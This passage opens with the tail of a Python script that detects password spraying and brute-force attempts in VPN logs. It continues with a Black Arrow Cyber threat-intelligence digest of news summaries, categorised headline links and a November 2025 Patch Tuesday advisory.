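    r"^(?P<ts>\S+) vpn (?P<result>auth-fail|auth-ok) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(log):
    """Turn raw lines into (timestamp, result, user, src) tuples; skip unparsable lines."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag sources whose failures touch >= min_users distinct accounts inside `window`.

    Returns {src: {"distinct_users": [...], "later_success": [...]}} where
    later_success lists accounts that source authenticated to after the spray began.
    """
    fails = defaultdict(list)       # src -> [(ts, user)] for auth-fail
    successes = defaultdict(list)   # src -> [(ts, user)] for auth-ok
    for ts, result, user, src in sorted(events):
        (fails if result == "auth-fail" else successes)[src].append((ts, user))

    alerts = {}
    for src, items in fails.items():
        # Sliding window anchored on each failure in time order.
        for i, (t0, _) in enumerate(items):
            users = {u for t, u in items[i:] if t - t0 <= window}
            if len(users) >= min_users:
                later_ok = sorted({u for t, u in successes[src] if t >= t0})
                alerts[src] = {"distinct_users": sorted(users), "later_success": later_ok}
                break
    return alerts


def detect_brute_force(events, window=timedelta(minutes=5), min_fails=5):
    """Flag (src, user) pairs with >= min_fails failures inside `window`:
    single-account guessing, the sibling pattern to spraying."""
    per_pair = defaultdict(list)    # (src, user) -> [ts]
    for ts, result, user, src in sorted(events):
        if result == "auth-fail":
            per_pair[(src, user)].append(ts)

    alerts = {}
    for (src, user), times in per_pair.items():
        for i, t0 in enumerate(times):
            n = sum(1 for t in times[i:] if t - t0 <= window)
            if n >= min_fails:
                alerts[src] = {"user": user, "failures": n}
                break
    return alerts


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("spray:", detect_spray(evs))
    print("brute force:", detect_brute_force(evs))
```

The thresholds (five distinct accounts, or five failures on one account, within five minutes) are starting points to tune against your own baseline; a spraying source that appears in `later_success` is the case to escalate first, since it indicates a guessed password that MFA did not stop.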

Companies Forced to Make Financial Changes After a Cyberattack

A survey of firms hit by cyberattacks found that 70% of publicly traded companies adjusted earnings or guidance afterwards and 68% saw their stock price affected. Among privately held businesses, 73% diverted budgets away from innovation and growth. Additionally, 92% reported legal, regulatory or compliance consequences such as fines or lawsuits. The research emphasises that recovery from an attack involves far more than restoring systems; it demands financial and strategic overhaul.

Source: https://betanews.com/2025/11/10/companies-forced-to-make-financial-changes-after-a-cyberattack/

Cyberattack Impact on Employees May Be as Serious as Technical Fallout

A survey of 500 Irish businesses found 40% suffered an attack in the past year, with many reporting burnout, stress and increased sick leave. Some saw improved loyalty, but most faced financial harm and ransomware pressures. The report also found that AI related vulnerabilities are rising, yet firms still see AI as beneficial overall.

Source: https://www.breakingnews.ie/ireland/cyberattack-impact-on-employees-may-be-as-serious-as-technical-fallout-1827184.html

UK’s New Cyber Security and Resilience Bill Targets Weak Links in Critical Services

Proposed cyber security legislation in the UK will expand existing regulations to cover MSPs, data centres and other essential suppliers. It introduces stricter security duties, 24-hour initial incident reporting and tougher enforcement powers. Operators of critical services would be required to notify affected customers quickly and maintain stronger controls across their supply chains.

Source: https://www.helpnetsecurity.com/2025/11/12/uk-cyber-security-and-resilience-bill/

Spy Boss Says Authoritarian Nations Ready to Commit ‘High Impact Sabotage’

Australia’s domestic intelligence and national security agency, ASIO, warns that hostile states are preparing for cyber sabotage targeting critical infrastructure. Officials cite recent probes by groups such as Volt Typhoon and Salt Typhoon. The director general urges boards to understand their operational dependencies and prepare for scenarios involving communications, power or water disruptions.

Source: https://www.theregister.com/2025/11/12/asio_cyber_sabotage_warnings/

Online Age Checking Is Creating a Treasure Trove of Data for Hackers

Age verification systems increasingly require photo IDs, selfies and credit card checks, creating sensitive data stores attractive to criminals. Breaches at Discord and the Tea app exposed large volumes of imagery and identity data despite policies stating minimal retention. The article argues that regulators lack sufficient power to enforce deletion, especially when third parties are offshore.

Source: https://theconversation.com/online-age-checking-is-creating-a-treasure-trove-of-data-for-hackers-268586

Google Play Store Hosted 239 Malicious Apps That Were Downloaded 40 Million Times

Researchers found 239 malicious Android apps on Google Play, totalling around 42 million downloads. Threats included spyware, banking trojans and adware, with detections rising 67% year on year. Google is tightening developer checks, but observers argue that serious malware continues to slip through, leaving users exposed.

Source: https://www.ghacks.net/2025/11/07/google-play-store-hosted-239-malicious-apps-that-were-downloaded-40-million-times/

Android Malware Steals Your Card Details and PIN to Make Instant ATM Withdrawals

A malware strain known as NGate captures NFC card data and PINs, allowing criminals to emulate victims' cards at cash machines. It spreads through phishing and fake banking apps. Users are advised to avoid unsolicited downloads, install only from trusted app stores and use mobile security tools to reduce risk.

Source: https://www.malwarebytes.com/blog/news/2025/11/android-malware-steals-your-card-details-and-pin-to-make-instant-atm-withdrawals



Threats

Ransomware, Extortion and Destructive Attacks

Qilin Ransomware Activity Surges as Attacks Target Small Businesses - Infosecurity Magazine

Are SMBs facing increasing ransomware threats? | Proton

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Cyberattacks 'costing the UK economy £14.7 billion' a year

Kraken ransomware benchmarks systems for optimal encryption choice

FBI: Akira gang has received nearly $250 million in ransoms | The Record from Recorded Future News

FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses | CyberScoop

'Ransomvibing' Infests Visual Studio Extension Market

Yanluowang initial access broker pleaded guilty to ransomware attacks

How a CPU spike led to uncovering a RansomHub ransomware attack

Russian Hacking Group Sandworm Deploys New Wiper Malware in Ukraine - Infosecurity Magazine

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

The ransomware payment ban: what’s the potential impact for UK businesses? | TechRadar

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan

Ransomware Victims

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

Synnovis Finally Issues Breach Notification After 2024 Ransomware Attack - Infosecurity Magazine

Hackers claim to leak Collins Aerospace data | Cybernews

UK economic growth slows due to cyberattack at Jaguar Land Rover

UK NHS Named in Clop Gang's Exploits of Oracle Zero-Days

Bank of England says JLR's cyberattack damaged UK GDP growth • The Register

Washington Post data breach impacts nearly 10K employees, contractors

Government not handing ‘free money’ to JLR after cyber attack, minister insists | Insider Media

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

Ransomed CTO falls on sword, refuses to pay extortion demand • The Register

DoorDash hit by new data breach in October exposing user information

Phishing & Email Based Attacks

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

5 reasons why attackers are phishing over LinkedIn

AI and phishing: a toxic pair | Professional Security Magazine

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

New Phishing Attack Leverages Popular Brands to Harvest Login Credentials - Cyber Security News

Google Looks to Dim 'Lighthouse' Phishing Kit

Major phishing attack hits hotels with ingenious new scam that also spreads dangerous malware | TechRadar

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Cyberattacks 'costing the UK economy £14.7 billion' a year

Other Social Engineering

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Attackers upgrade ClickFix with tricks used by online stores - Help Net Security

ClickFix Attacks Against macOS Users Evolving - SecurityWeek

What is FileFix — a ClickFix variation? | Kaspersky official blog

ClickFix may be the biggest security threat your family has never heard of - Ars Technica

5 reasons why attackers are phishing over LinkedIn

Phishers target 5K Facebook advertisers with fake biz pages • The Register

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Wanna bet? Scammers are playing the odds better than you are - Help Net Security

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Google goes after massive phishing enterprise behind those spammy USPS messages - Neowin

Fraud, Scams and Financial Crime

Cyberattacks 'costing the UK economy £14.7 billion' a year

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Wanna bet? Scammers are playing the odds better than you are - Help Net Security

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

"Vibescamming" is the new online scam everyone’s falling for

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

Google goes after massive phishing enterprise behind those spammy USPS messages - Neowin

Google Looks to Dim 'Lighthouse' Phishing Kit

Thousands of Chinese lured abroad and forced to be scammers - now Beijing is cracking down - BBC News

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

'Dodgy' Amazon Fire TV sticks are leaving users open to financial fraud | News Tech | Metro News

Improve Collaboration to Hit Back At Rising Fraud, Says techUK - Infosecurity Magazine

Lost iPhone? Don’t fall for phishing texts saying it was found

How Elder Fraud Reveals Gaps in Human-Centric Security

Artificial Intelligence

Survey Surfaces Sharp Rise in Cybersecurity Incidents Involving AI - Security Boulevard

Chinese hackers used Claude for a large-scale cyberattack, alleges Anthropic - Technology News | The Financial Express

"Vibescamming" is the new online scam everyone’s falling for

AI and phishing: a toxic pair | Professional Security Magazine

Cybercriminals Are Now Using AI to Create Shape-Shifting Malware, Google Warns

AI Agents Are Going Rogue: Here's How to Rein Them In

65% of Leading AI Companies Found With Verified Secrets Leaks - Infosecurity Magazine

Advocacy group calls on OpenAI to address Sora 2’s deepfake risks | CyberScoop

Los Alamos researchers warn AI may upend national security - Help Net Security

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

AI chat privacy at risk: Microsoft details Whisper Leak side-channel attack

Military experts warn security hole in most AI chatbots can sow chaos

Execs Say AI Use is Making Companies Vulnerable to Attacks: Survey | MSSP Alert

Many Forbes AI 50 Companies Leak Secrets on GitHub - SecurityWeek

Shadow AI risk: Navigating the growing threat of ungoverned AI adoption - Help Net Security

Legal Reputations at Risk: How AI is Reshaping Cyber Threats in Law – Artificial Lawyer

'Ransomvibing' Infests Visual Studio Extension Market

Autonomous AI could challenge how we define criminal behavior - Help Net Security

Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool - Ars Technica

Malware

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program

Cybercriminals Are Now Using AI to Create Shape-Shifting Malware, Google Warns

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Infostealers are making this old security practice new again | PCWorld

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Hackers Weaponizing Calendar Files as a New Attack Vector Bypassing Traditional Email Defenses

Threat Actors Attacking Outlook and Google Bypassing Traditional Email Defenses

DanaBot malware is back to infecting Windows after 6-month break

Major phishing attack hits hotels with ingenious new scam that also spreads dangerous malware | TechRadar

Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack

GootLoader Is Back, Using a New Font Trick to Hide Malware on WordPress Sites

Rhadamanthys infostealer disrupted as cybercriminals lose server access

Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging

1,000+ Servers Hit in Law Enforcement Takedown of Rhadamanthys, VenomRAT, Elysium - SecurityWeek

Large-Scale ClickFix Phishing Attacks Target Hotel Systems with PureRAT Malware

Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation

Hackers abuse Triofox antivirus feature to deploy remote access tools

Bots/Botnets

A new round of Europol’s Operation Endgame dismantled Rhadamanthys, Venom RAT, and Elysium botnet

Mobile

Beware the 'Hi, how are you?' text. It's a scam - here's how it works | ZDNET

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

Google Play Store hosted 239 malicious apps that were downloaded 40 million times - gHacks Tech News

Warning! Don't open these WhatsApp images, else you'll get hacked | PCWorld

New Android Malware ‘Fantasy Hub’ Intercepts SMS Messages, Contacts and Call Logs

Android malware steals your card details and PIN to make instant ATM withdrawals | Malwarebytes

What is the Pixnapping vulnerability, and how to protect your Android smartphone? | Kaspersky official blog

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

Popular Android-based photo frames download malware on boot

Lost iPhone? Don’t fall for phishing texts saying it was found

Denial of Service/DoS/DDoS

Cisco: Actively exploited firewall flaws now abused for DoS attacks

Multiple Django Vulnerabilities Enable SQL injection and DoS Attack

Cyberattack hits Danish government and defence companies | European Pravda

Internet of Things – IoT

UK.gov probes security risks of Chinese electric buses • The Register

Data Breaches/Leaks

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

65% of Leading AI Companies Found With Verified Secrets Leaks - Infosecurity Magazine

Synnovis Finally Issues Breach Notification After 2024 Ransomware Attack - Infosecurity Magazine

Hackers claim to leak Collins Aerospace data | Cybernews

UK NHS Named in Clop Gang's Exploits of Oracle Zero-Days

AI chat privacy at risk: Microsoft details Whisper Leak side-channel attack

Military experts warn security hole in most AI chatbots can sow chaos

Execs Say AI Use is Making Companies Vulnerable to Attacks: Survey | MSSP Alert

Many Forbes AI 50 Companies Leak Secrets on GitHub - SecurityWeek

Legal Reputations at Risk: How AI is Reshaping Cyber Threats in Law – Artificial Lawyer

Washington Post data breach impacts nearly 10K employees, contractors

Website Security Breaches: 13 Lessons Learned from Small Businesses - DevX

Whisper Leak: A novel side-channel attack on remote language models | Microsoft Security Blog

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

New IT woe at Legal Aid Agency | Law Gazette

Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool - Ars Technica

Organised Crime & Criminal Actors

The Professionalised World of Cybercrime and the New Arms Race - Security Boulevard

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Yanluowang initial access broker pleaded guilty to ransomware attacks

Autonomous AI could challenge how we define criminal behavior - Help Net Security

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

Insider Risk and Insider Threats

Cyberattack impact on employees may be as serious as technical fallout

Insurance

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Cyber insurance pay-outs triple | Professional Security Magazine

Nearly £200 million paid in cyber claims to help UK businesses recover | ABI

Cyber Execs Get Insurance, Legal Counsel Perks Amid Higher Risks

Supply Chain and Third Parties

Allianz UK confirms Oracle EBS compromise • The Register

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site - SecurityWeek

Synnovis notifies of data breach after 2024 ransomware attack

Synnovis Finally Issues Breach Notification After 2024 Ransomware Attack - Infosecurity Magazine

GlobalLogic Becomes Latest Cl0p Victim After Oracle EBS Attack - Infosecurity Magazine

Cloud/SaaS

Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks

Microsoft's data sovereignty: Now with extra sovereignty! • The Register

Identity and Access Management

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Encryption

Are we ready for the post-quantum era? | TechRadar

Linux and Open Source

CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs

Passwords, Credential Stuffing & Brute Force Attacks

New Phishing Attack Leverages Popular Brands to Harvest Login Credentials - Cyber Security News

Enterprise Credentials at Risk – Same Old, Same Old?

Social Media

5 reasons why attackers are phishing over LinkedIn

Phishers target 5K Facebook advertisers with fake biz pages • The Register

The common social media security measure that creates a treasure trove for hackers | The Independent

Online age checking is creating a treasure trove of data for hackers

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

Regulations, Fines and Legislation

ID verification laws are fueling the next wave of breaches

British government unveils long-awaited landmark cybersecurity bill | The Record from Recorded Future News

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Cyber bill offers 'no guarantee of security', tech lawyer says - UKTN

Exclusive: Ofcom is monitoring VPNs following Online Safety Act. Here's how | TechRadar

Omega Systems’ New Financial Services Report Reveals Mounting Regulatory Pressure and Rising ‘Compliance Fatigue’

The Government Shutdown Is a Ticking Cybersecurity Time Bomb | WIRED

China amends its Cybersecurity Law

America’s cybersecurity defenses are cracking | The Verge

Cyber information sharing law would get extension under shutdown deal bill | CyberScoop

CISA, FCEA funding set to resume as shutdown nears its end • The Register

Age verification lands in Italy − here’s how it affects VPN users | TechRadar

Extra defence investment essential to maintain a durable defence culture, experts warn - University of Exeter News

Models, Frameworks and Standards

A guide to the UK Cyber Security and Resilience Bill (CSRB) | Professional Security Magazine

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Broken access control still tops list of app sec top 10 • The Register

Data Protection

EU’s leaked GDPR, AI reforms slated by privacy activists • The Register

Careers, Working in Cyber and Information Security

CISOs are cracking under pressure - Help Net Security

CISO Pay Packages Grow as Overall Security Spending Slows: IANS | MSSP Alert

From Forensics to AI: New bulletin maps out Cyber Security careers | Department for the Economy

Extra defence investment essential to maintain a durable defence culture, experts warn - University of Exeter News

Why We Need More Veterans in Intelligence, Cybersecurity, and STEM - ClearanceJobs

Resilience for resilience: Managing burnout among cyber leaders | Computer Weekly

The New Battlefield: 3 Veterans Discuss Their Transition to Cybersecurity | Security Magazine

Cyber Execs Get Insurance, Legal Counsel Perks Amid Higher Risks

Law Enforcement Action and Take Downs

$7.3B crypto laundering: ‘Bitcoin Queen’ sentenced to 11 Years in UK

1,000+ Servers Hit in Law Enforcement Takedown of Rhadamanthys, VenomRAT, Elysium - SecurityWeek

New NCA Campaign Warns Men Off Crypto Investment Scams - Infosecurity Magazine

Yanluowang initial access broker pleaded guilty to ransomware attacks

Russian hacker admits helping Yanluowang ransomware infect companies

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Spy boss says authoritarian nations poised for sabotage • The Register

Australian spy chief warns Chinese hackers are 'probing' critical networks for espionage and sabotage | TechCrunch

Los Alamos researchers warn AI may upend national security - Help Net Security

From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools

Data breach at Chinese infosec firm reveals weapons arsenal • The Register

Russia's suspected 'hybrid war' puts European air defences to the test | The Straits Times

War continues in cyberspace: Final cybersecurity education session concludes in Kyiv

TP-Link Routers Could Soon Be Banned. Here's What Cybersecurity Experts Say About the Risk - CNET

The threat of space terrorism is no longer science fiction, but we’re ill-prepared to combat it

Nation State Actors

China

Spy boss says authoritarian nations poised for sabotage • The Register

Anthropic Says Claude AI Powered 90% of Chinese Espionage Campaign - SecurityWeek

Chinese hackers used Claude for a large-scale cyberattack, alleges Anthropic - Technology News | The Financial Express

Chinese spies used Claude to break into critical orgs • The Register

China's Cyber Silence Is More Worrying Than Russia's Noise, Chief Cybersecurity Strategist Says - SecurityWeek

Australian spy chief warns Chinese hackers are 'probing' critical networks for espionage and sabotage | TechCrunch

From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools

Data breach at Chinese infosec firm reveals weapons arsenal • The Register

UK.gov probes security risks of Chinese electric buses • The Register

Denmark and Norway investigate Yutong bus security flaw amid rising tech fears

TP-Link Routers Could Soon Be Banned. Here's What Cybersecurity Experts Say About the Risk - CNET

China amends its Cybersecurity Law

This Is the Platform Google Claims Is Behind a 'Staggering’ Scam Text Operation | WIRED

Thousands of Chinese lured abroad and forced to be scammers - now Beijing is cracking down - BBC News

MPs preparing to examine Chinese state influence at British universities | House of Commons | The Guardian

Palantir CEO Says a Surveillance State Is Preferable to China Winning the AI Race

Russia

China's Cyber Silence Is More Worrying Than Russia's Noise, Chief Cybersecurity Strategist Says - SecurityWeek

Russia's suspected 'hybrid war' puts European air defences to the test | The Straits Times

War continues in cyberspace: Final cybersecurity education session concludes in Kyiv

Russian Hacking Group Sandworm Deploys New Wiper Malware in Ukraine - Infosecurity Magazine

Russian pleads guilty, staring at 53 years and $9.2M penalty - Cryptopolitan

Russian national pleads guilty to breaking into networks for Yanluowang ransomware attacks | CyberScoop

Russian Hackers Create 4,300 Fake Travel Sites to Steal Hotel Guests' Payment Data

Belgian military intelligence service websites attacked by Russian hackers | VRT NWS: news

Russian hacker admits helping Yanluowang ransomware infect companies

Iran

Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging

North Korea

APT37 hackers abuse Google Find Hub in Android data-wiping attacks

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

[Editorial] The silent war - The Korea Herald

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Emulating the Espionage-Oriented Group SideWinder - Security Boulevard


Tools and Controls

Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program

Threat Actors Leverage RMM Tools to Deploy Medusa & DragonForce Ransomware

Why Cybersecurity Must Shift To Continuous Incident Response

Online age checking is creating a treasure trove of data for hackers

New Age Verification Bills Could Ban VPNs, Jeopardize the Privacy of Millions - CNET

Ransomware fuels 230% increase in UK cyber insurance payouts • The Register

Cisco: Actively exploited firewall flaws now abused for DoS attacks

AI is forcing boards to rethink how they govern security - Help Net Security

ISO - Threat intelligence and why it matters for cybersecurity

Controversy Brews: US Government Targets Banning Top Wi-Fi Router - CNET

Broken access control still tops list of app sec top 10 • The Register

Exclusive: Ofcom is monitoring VPNs following Online Safety Act. Here's how | TechRadar

Resilience and AI risk | Professional Security Magazine

Automation can't fix broken security basics - Help Net Security

The browser is eating your security stack - Help Net Security

CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs

Active Directory Under Siege: Why Critical Infrastructure Needs Stronger Security

Age verification lands in Italy - here’s how it affects VPN users | TechRadar

To get funding, CISOs are mastering the language of money - Help Net Security

Reducing the risk of major cyber incidents in the UK through digital resilience | UKAuthority

NCSC Set to Retire Web Check and Mail Check Tools - Infosecurity Magazine



Vulnerability Management

When Attacks Come Faster Than Patches: Why 2026 Will be the Year of Machine-Speed Security

UK department pours massive funds into outdated Windows 10 upgrade while thousands of devices remain stranded on ageing hardware | TechRadar

Microsoft: Windows 11 23H2 Home and Pro reach end of support

Vulnerabilities

Microsoft Patch Tuesday security updates for November 2025 fixed an actively exploited Windows Kernel bug

Cisco: Actively exploited firewall flaws now abused for DoS attacks

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Cisco fixes critical UCCX flaw allowing Root command execution

SAP fixed a maximum severity flaw in SQL Anywhere Monitor

Zoom Workplace for Windows Vulnerability Allows Users to Escalate Privilege

Chipmaker Patch Tuesday: Over 60 Vulnerabilities Patched by Intel - SecurityWeek

High-Severity Vulnerabilities Patched by Ivanti and Zoom - SecurityWeek

Firefox 145 and Chrome 142 Patch High-Severity Flaws in Latest Releases - SecurityWeek

CitrixBleed 2, Cisco Flaw Wreak Havoc as Zero-Day Bugs

CISA Flags Critical WatchGuard Fireware Flaw Exposing 54,000 Fireboxes to No-Login Attacks

Microsoft Exchange 'Under Imminent Threat', Act Now

Fortinet FortiWeb flaw with public PoC exploited to create admin users

Palo Alto PAN-OS Firewall Vulnerability Lets Attackers Reboot Firewall by Sending Malicious Packet

Android Devices Targeted by KONNI APT in Find Hub Exploitation - Infosecurity Magazine

Multiple Django Vulnerabilities Enable SQL injection and DoS Attack

What is the Pixnapping vulnerability, and how to protect your Android smartphone? | Kaspersky official blog

Dangerous runC flaws could allow hackers to escape Docker containers

Adobe Patches 29 Vulnerabilities - SecurityWeek

Hackers abuse Triofox antivirus feature to deploy remote access tools

QNAP fixes seven NAS zero-day flaws exploited at Pwn2Own

Critical Triofox Vulnerability Exploited in the Wild - SecurityWeek

RCE flaw in ImunifyAV puts millions of Linux-hosted sites at risk

ChatGPT Vulnerability Exposed Underlying Cloud Infrastructure - SecurityWeek

Synology fixes BeeStation zero-days demoed at Pwn2Own Ireland


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.



Black Arrow Cyber Advisory - 12 November 2025 - Security Updates from Microsoft, Adobe and SAP

Executive Summary

This month’s Patch Tuesday features updates from Microsoft, Adobe and SAP. Microsoft’s release spans Windows, Microsoft 365/Office components and server/identity platforms. Adobe has posted product-specific advisories across its portfolio. SAP published its November Patch Day with a notable volume of new Security Notes. Prioritise internet-facing systems, identity infrastructure and widely deployed desktop applications, with emphasis on critical remote code execution and privilege escalation fixes.

Vulnerabilities by Vendor

Microsoft addressed 63 vulnerabilities impacting Windows, Windows Components, Office, Office Components, Edge, Azure Monitor Agent, Dynamics 365, Hyper-V, SQL Server, and WSL (Windows Subsystem for Linux) GUI. Four of these vulnerabilities are rated as Critical and 59 are rated Important. No vulnerabilities addressed this month were publicly known at the time of release and none are known to be under active exploitation.

Adobe’s update addresses 29 vulnerabilities across InDesign, InCopy, Photoshop, Illustrator, Pass, Substance 3D Stager, and Format Plugins products. Critical arbitrary code execution vulnerabilities were addressed in InDesign, InCopy, Photoshop, Illustrator, Substance 3D Stager, and Format Plugins. Adobe says there is no evidence that any of these vulnerabilities are known to have been exploited in the wild.

SAP addressed 19 security vulnerabilities this month, including a critical flaw in SQL Anywhere Monitor and other vulnerabilities relating to Solution Manager, CommonCryptoLib, NetWeaver AS ABAP/Java, S/4HANA components, Business Connector and SAP GUI.

What’s the risk to me or my business?

The presence of actively exploited zero-days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

For more information:

Microsoft — https://msrc.microsoft.com/update-guide/releaseNote/2025-Nov

Adobe — https://helpx.adobe.com/security/security-bulletin.html

SAP — https://support.sap.com/en/my-support/knowledge-base/security-notes-news/november-2025.html


Black Arrow Cyber Threat Intelligence Briefing 07 November 2025

Black Arrow Cyber Threat Intelligence Briefing 07 November 2025:

-Enterprises are Not Prepared for a World of Malicious AI Agents

-The Phishing Renaissance, How AI Brought Back the Classics

-‘Data Sprawl’ Is Now Your Security Team’s Biggest Headache – And It’s Only Going to Get Worse

-Old Threats, New Consequences: 90% of Cyber Claims Stem from Email and Remote Access

-Survey: Organisations are Too Confident in Their Cyber Resiliency

-Thousands Fall Victim to Ransomware as European Attacks Reach Record Highs - Here’s Why They’re So at Risk

-How Ransomware Attacks Leverage Cyber Insurance Policies

-Violent Cybercrime Surges in Europe Amid Big Payouts

-Three of the Biggest Cybercrime Gangs Around Appear to Be Teaming Up - Which Could Be Bad News for All of Us

-Google Says 2026 Will Be the Year AI Supercharges Cybercrime

-Enterprises are Losing Track of the Devices Inside Their Networks

-Britain ‘Highly Vulnerable’ to Russian Cyber Attacks, Warns Former Army Chief

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week’s stories highlight how AI is reshaping cyber threats, with malicious agents, deepfakes and automated phishing increasing both scale and sophistication. In particular, giving AI agents their own credentials or identities creates risks that attackers can exploit. Business leaders must now consider AI-driven risks as part of their core governance responsibilities. Risks are further increased by the growth of data held by businesses, including redundant or abandoned data.

We also report on the resurgence of classic attack methods like phishing and email compromise, now supercharged by generative AI. Ransomware remains a dominant threat, with attackers exploiting cyber insurance policies and even resorting to physical intimidation. European organisations are particularly exposed, and many still pay ransoms, which encourages repeat targeting. Research shows that business leaders have an inaccurate perception of their organisation’s readiness to recover from an incident.

The key theme here is the need for business leaders to be informed of the current and emerging threats to their business, and to know how to mitigate these risks through a strategy that they govern alongside their other risks. Contact us to discuss how to make this work proportionately in your organisation.


Top Cyber Stories of the Last Week

Enterprises are Not Prepared for a World of Malicious AI Agents

Palo Alto Networks CEO Nikesh Arora warns that most organisations are ill equipped to manage the growing number of AI agents accessing corporate systems. These non-human identities can act like employees, holding credentials and privileges that expand the attack surface. Existing identity and privileged access tools track only a fraction of users, leaving many AI agents unmonitored. This gap will worsen as both legitimate and malicious agents proliferate. Centralised management of user access and permissions is needed to prevent uncontrolled access and misuse.

Source: https://www.zdnet.com/article/enterprises-are-not-prepared-for-a-world-of-malicious-ai-agents/

The Phishing Renaissance, How AI Brought Back the Classics

